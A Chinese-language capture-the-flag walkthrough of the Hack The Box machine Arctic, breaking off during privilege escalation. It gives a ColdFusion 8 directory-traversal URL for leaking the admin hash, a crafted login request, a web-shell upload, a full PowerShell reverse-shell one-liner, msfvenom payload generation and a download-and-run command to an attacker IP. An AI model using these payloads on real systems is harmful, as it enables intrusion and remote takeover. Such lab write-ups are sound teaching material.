废话不多说直接开始:
第一步是在计算机上运行NMAP:
# Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 19 15:00:16 2020 -- 1 IP address (1 host up) scanned in 329.63 seconds
从输出中我们可以看到MSRPC正在135和49154上运行,并且端口8500上可能存在FMTP。我更仔细地研究了端口8500,浏览到该端口后发现它正在运行Adobe Coldfusion。浏览到管理员登录页面表示其正在运行版本8。
http://10.10.10.11:8500/CFIDE/administrator/index.cfm
nets.ec提供了一个很好的资源,涉及冷熔黑客攻击以及使用本地文件泄露漏洞登录管理面板。如网站上所述,第一个步骤是使用LFI漏洞通过浏览到以下位置来查看password.properties文件:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=…\ColdFusion8\lib\password.properties%00en
然后,这向我们显示了哈希密码值:
然后,您将哈希复制到密码字段中,并通过从地址栏中执行以下脚本来运行以下JavaScript脚本:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
这将生成带有HMACed哈希的警报。
然后,我启动了BURP,并使它能够拦截HTTP通信。我从Coldfusion管理面板发出了HTTP请求。需要在BURP中修改该请求,因为cfadminPassword值与JavaScript警报中报告的HMACed值匹配。我的POST请求如下所示:
POST /CFIDE/administrator/enter.cfm HTTP/1.1
Host: 10.10.10.11:8500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
Content-Type: application/x-www-form-urlencoded
Content-Length: 422
Connection: close
Cookie: CFID=100; CFTOKEN=75808739
Upgrade-Insecure-Requests: 1
cfadminPassword=AD8AC0F171DEEACB68EA99CF11A19C4E2CFC9C97&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%2500en&salt=1601344007175&submit=%23Wed+Mar+22+20%3A53%3A51+EET+2017%0D%0Ardspassword%3D0IA%2FF%5B%5BE%3E%5B%24_6%26+%5C%5CQ%3E%5BK%5C%3DXP++%5Cn%0D%0Apassword%3D2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03%0D%0Aencrypted%3Dtrue
将修改后的POST请求从BURP转发到Coldfusion服务器后,您就可以成功登录。然后,我继续按照指南在计算机上生成反向Shell。我打开了Coldfusion管理面板左侧的“计划任务”菜单,并创建了一个新的计划任务。我想上传kali随附的CFM Shell。可以在/usr/share/webshells/cfm/cfexec.cfm中找到它。我使用以下命令在我的kali机器上启动了python HTTP服务器来托管此shell:
python -m SimpleHTTPServer 8000
然后,我在Coldfusion中创建了计划任务,确保在我的Kali机器上输入外壳程序的URL以及要保存该外壳程序的位置。可以在映射下找到。
然后,我提交了计划任务,执行了该任务,然后浏览到我选择保存外壳程序的位置。我对shell表示欢迎,这意味着计划的任务成功地从我的kali机器下载并保存了shell:
然后,我在命令文本框中输入“ c:\ windows \ system32 \ cmd.exe”,并在选项框中输入以下命令:
/c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',2700);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" > C:\ColdFusion8\wwwroot\bs.txt
这将在端口2700上为我的kali机器创建一个反向外壳。我打开MSFCONSOLE并在端口2700上启动了一个多重处理程序。然后我从Coldfusion Shell Web界面执行了Powershell反向外壳:
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2700
lport => 2700
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.34:2700
[*] Command shell session 1 opened (10.10.14.34:2700 -> 10.10.10.11:54928) at 2020-09-28 13:07:26 -0400
S C:\ColdFusion8\runtime\bin> cd /
PS C:\> cd Users
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 22/3/2017 8:10 ?? Administrator
d-r-- 14/7/2009 7:57 ?? Public
d---- 22/3/2017 9:00 ?? tolis
PS C:\Users> cd tolis
PS C:\Users\tolis> cd Desktop
PS C:\Users\tolis\Desktop> ls
Directory: C:\Users\tolis\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 22/3/2017 9:01 ?? 32 user.txt
PS C:\Users\tolis\Desktop> cat user.txt
[REDACTED]
从输出中,您可以看到它已成功执行,并且我能够读取用户标志。
下一步是执行特权升级。我首先尝试将基本的反向TCP外壳提升为meterpreter外壳。我使用MSF毒液创建了一个exe,可以从当前的shell执行该exe,以生成一个meterpreter shell。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=2901 -f exe > 0005.exe
然后使用以下命令将其上传到Arctic机器:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.38:8000/0005.exe','0005.exe')"
然后,我在metasploit中启动了一个多处理程序,以监听端口2901,并执行了利用程序。
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit